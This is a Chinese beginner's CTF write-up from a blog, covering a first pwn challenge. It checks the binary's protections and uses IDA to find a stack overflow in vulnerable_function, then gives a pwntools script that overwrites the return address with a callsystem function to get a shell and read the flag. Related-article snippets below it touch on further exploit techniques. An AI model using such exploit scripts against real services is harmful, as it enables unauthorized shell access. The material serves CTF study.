做的第一道pwn题

最新推荐文章于 2024-04-20 23:07:57 发布
最新推荐文章于 2024-04-20 23:07:57 发布
阅读量1.2k 收藏 19
点赞数 3
分类专栏: pwn 文章标签: linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/LL021101/article/details/123618389
版权

 做题步骤

一、使用Ubuntu,对pwn文件进行扫瞄;

  file语句主要用来看本文件是多少位的,是不是elf文件——ELF文件详解—初步认识_code&poetry的博客-CSDN博客_elf文件,(该链接详细介绍了elf文件的基本结构),图中显示64-bit,意思是64位的文件

  checksec命令是用来查看该文件有哪些保护措施。 

 NX(DEP):数据执行防护
 Canary(FS):栈溢出保护
 RELRO(ASLR):(地址随机化)
 PIE(代码地址随机化)
因为该题比较简单,所以防护比较少。

二、使用IDA

因为文件是64位的,所以用ida64打开,按F5反汇编成为c语言代码,要找溢出漏洞,我们首先得找哪里有输入,暂时main函数内未找到,但是我们怀疑再vulnerable_function中有溢出双击打开开函数

 

read函数规定最大可以写入0X200个字节,而buf到栈底只有0X80,所以有溢出。

双击buf之后,看以看到buf直接通到栈底,并且最后有八个字节用来接收返回地址,所以我们可以就此进行覆盖,使其返回到我们想要的地址上去(也就是system函数所在的地址上去,这样获取/bin/sh,获得后门)

 我们应该对system,/bin/sh等字眼比较敏感,有一个callsystem,点开发现我们想要的,找到该函数地址为0x40596

根据main函数的结构我们知道,我们要先接收helloworld字符串,再输入,输入我们构造好的字符

串payload。


from pwn import *

io = remote("111.200.241.244",58424)//建立远程连接,也就是链接该题目的环境

callsystem = 0x400596

io.recvline()//接受一行函数的输出

payload = 0x88*b'a' + p64(callsystem)//先将buf和rbp覆盖掉,再写入callsystem的地址。

io.sendline(payload)

io.interactive()

 在虚拟机中执行该文件。

 交互正常进行,所以成功,ls列出该目录下的所有文件,cat抓取flag。

 

总结

1.了解文件的结构,有哪些漏洞。

2.学会找在哪里会出现溢出漏洞,并做好总结。

3.对于相关字眼要敏感。

4.要理解解题步骤。

请输入昵称_____
关注
  • 3
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Ctfshow pwn 02(自己出的第一道pwn
weixin_64875092的博客
12-05 5279
算是一篇第一次pwn的日记了! 本文写给想要入门pwn但只安装好虚拟机和ida完全不知道怎么用的小白~ 有许多写的不严谨或无脑的地方请多包涵! 其中有许多我在时踩到的坑(因为自己零基础实在不知道怎么问也不知道去问谁而导致浪费好多时间而进行不下去) 现在开始! 首先第一步,来到ctfshow的网站,找到这道pwn02 之后点击Launch an instance(这所是一个建立连接的步骤,少了这一步在使用python3时会出现如下报错)如果问我什么是python3,请耐心看下去
pwn解题思路(1)
Shangku92的博客
06-07 613
from pwn import * import time context(arch='amd64',os='linux') context.log_level = 'debug' #io=remote("plaidflix.pwni.ng",1337) #p=process(argv=['./proc',args]) elf=ELF('./funnyrace') libc=ELF('./libc-2.31.so') #p = process('./funnyrace') def a(): sle..
xctf攻防世界pwn基础解(新手食用)
热门推荐
Spwpun的博客
05-01 2万+
文章目录CGFsb status:updating… CGFsb 前面的那一道get_shell的算是pwn的一般流程:下载文件,ida查看代码,分析漏洞,利用漏洞写出exp,最常用的是用到python的pwntools,然后使用nc或者pwntools连接到虚拟场景实现漏洞攻击得到flag。 本的思路基本一致,使用pwntools编写漏洞利用脚本,这里的漏洞是格式化字符串漏洞,文章分...
PWN完整出流程(GCC编译ELF文件,搭建GZ:CTF平台,基于CTF-Xined部署题目至GZ:CTF平台)
最新发布
流水不争先,争的是滔滔不绝
04-20 1604
GCC编译C源文件至ELF可执行文件,利用docker搭建开源GZ:CTF赛事平台,基于github开源项目CTF-xined部署pwn至GZ:CTF平台。一次完整实现从C源码开始到题目部署平台的pwn全流程详解
[PWN]——格式化字符串漏洞(包含几种解题方法
ysy___ysy的博客
01-19 2139
如果要自己采用"%x$n"的方式手动构造payload容易出错,所以使用pwntools中的FmtStr格式化字符串类来解决格式化字符串漏洞比较方便。如果有什么错误的地方请师傅们告诉我一下。本文制作不易,盗版必究。
pwn练习附件四道含exp
11-21
个人pwn练习题目https://blog.csdn.net/yusakul/article/details/103147299,含exp,推荐去原链接下载:https://bbs.ichunqiu.com/thread-42241-1-1.html
【第一天】pwn,获取系统权限,入门,cyclic-附件资源
03-05
【第一天】pwn,获取系统权限,入门,cyclic-附件资源
第六点评及解题思路——Repwn1
08-03
这篇文章是关于一场名为KCTF的安全竞赛中的第六——"Repwn1"的解题思路和点评。这道题目结合了pwn(利用程序漏洞获取控制权)和re(逆向工程)两种技术,旨在测试参赛者的综合能力,特别是对DES(Data Encryption ...
第四点评及解题思路——拯救单身狗1
08-03
题目是一道安全竞赛中...这道题目不仅考验参赛者对堆溢出漏洞的理解,还涉及到逆向分析、内存管理、libc利用等多个方面,是一个综合性的安全挑战。通过这样的练习,参赛者可以提升在真实环境中分析和利用漏洞的能力。
CTF 一次PWN解题的小技巧
顶峰
03-28 1109
行文至此,本次测试也就结束了!文章略长,简单个总结:在本文中,我们通过使用CTF示例讨论了漏洞利用开发的过程,我们了解了程序如何从argv和argc接收输入的参数。最后,了解了由于较小的随机范围,32位系统中的ASLR为何容易受到攻击,以及如何利用此漏洞进行攻击。我们可以使用 "scp "命令轻松地将我们的脚本上传到服务器的tmp目录下,就像这样。
2022NewStarCTF pwn大部分
m0_51251108的博客
11-18 1738
今年9~10月的比赛,题目从易到难,知识面广,还是很不错的,复现一下这比赛的pwn
PWN的一些记录
Zoxiee的博客
12-30 438
基本只记录思路,不贴exp 更多PWN基础知识笔记可能在这里 hitcon2016 houoforange 思路:2.23,unsortedbin attack伪造IO_FILE和vtable,要libc.symbols[’_IO_list_all’] 程序可以无限制溢出,从而修改unsorted bin内容,直接把unsortbin的size修改为0x60(small bin),同时修改bk位置为IO_list_all-0x10,从而往任意地址写unsortednom本身地址,因为 unsorted_ch
攻防世界PWNpwn11
seaaseesa的博客
02-09 681
pwn11 首先,检查一下程序的保护机制 然后,我们用IDA分析一下 程序会把字符串里的I替换成you,导致strcpy后,s出现栈溢出,直接覆盖到后门函数地址即可 后门函数 综上,我们的exp脚本 #coding:utf8 from pwn import * sh = process('./pwn11') sh = remote('111.198.29.45',31...
pwn入门小技巧
qq_36918532的博客
05-24 2684
目前我所遇到的一些pwn技巧 我也是偶尔玩玩ctf,所以也不会很难的,所以这篇主要是帮助刚开始学习的人学习吧 首先知识点包括:栈,堆,整数溢出,格式化字符串 目前ctf的越来越偏向于实际,有的会使用刚刚爆出来的CVE漏洞的,所以不能只局限于glibc 所以可以大体分为两类把:libc,kernel 栈利用:有ret2libc,ret2shellcode,ret2text,ropchain,ret2syscall,brop,srop等等,当然有时候还会有seccomp的只能使用ORW系统调用 堆利用:
pwn核心解题技巧(1)
Shangku92的博客
06-07 663
*pip qinghuayuan ::pip config set global.index-url https://pypi.tuna.tsinghua.edu.cn/simple *enevrionment: **libc: getlibc: #get libc versions ./update_list & cat list #download libcversion(in list) addldtolib64: #进入64位的目录 glibc 32位就 cd /lib cd...
PWN[强网先锋]orw超详细讲解(多解法)
am_03的博客
09-01 4290
知识点 构造一段shellcode的作用就是为了在缓冲区溢出时将shellcode的地址覆盖正常的返回地址。 \x00 截断符 shellcode里出现\x00就会从其截断,所以构造shellcode的时候要避免\x00 x64函数调用规则 x64机器在调用某个函数前,比如int func(int a, int b, int c, int d, int e, int f, int g, int h),首先他会把前6个参数从左往右存入到寄存器rdi、rsi、rdx、rcx、r8、r9,其余参数存入到栈里,保存
BugkuCTF-PWNpwn7-repeater详细讲解多解法
am_03的博客
08-31 4054
知识点 解题流程 方法一 查看文件类型: 32位文件 查看保护机制 只开启了NX 32位IDA打开 伪码: 0x70=112 0x64=100 发现该题目为典型的格式字符串漏洞。 解题思路 此的大概思路如下: 1、找到libc_start_main在栈内的偏移,使用%p暴露该地址 2、利用LibcSearcher猜测使用的libc,算出libc基址 3、计算出此libc的system地址 4、把prinf的got表改为system地址 5、执行system(’/bin/sh’) 具体调试 执行gd
level0-pwn题目新手营第二思路总结
xindada559的博客
06-04 243
终于到第二啦,继续加油!(当然还是先跟着大佬的步骤学习人家是咋的,然后再总结一下自己出现的问
ctf 简单pwn资源
08-09
CTF 简单 PWN 资源是指为了让参与网络攻防竞赛的选手提高他们在 PWN 领域的技能而准备的一些简单题目。这些题目通常要求选手对二进制代码进行逆向工程、利用漏洞并实施攻击,以获取题目提供的关键信息或获取系统控制权。 CTF 简单 PWN 题目的资源可以在各种在线平台上找到,例如 CTF 竞赛中常用的CTFd、pwnable.kr 和 picoCTF 等。这些平台提供了大量不同难度的 PWN 题目,从初学者到专业选手都能找到适合自己水平的题目。 此外,还有一些开源项目和教程可以帮助学习简单 PWN 题目的解决方法。例如,pwntools 是一个功能强大的 Python 库,提供了一系列与二进制漏洞利用相关的工具和函数。还有一些博客和视频教程,介绍了从入门级到高级级别的 PWN 解题技巧和常见漏洞的利用方式。 总结来说,CTF 简单 PWN 题目资源是指为了提高参赛者在 PWN 领域的技能而准备的一些简单的二进制漏洞利用题目。这些资源可以通过在线平台、开源项目和教程找到,对于想要在 CTF 竞赛中取得好成绩或提高网络安全技能的人们来说都是非常有价值的。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值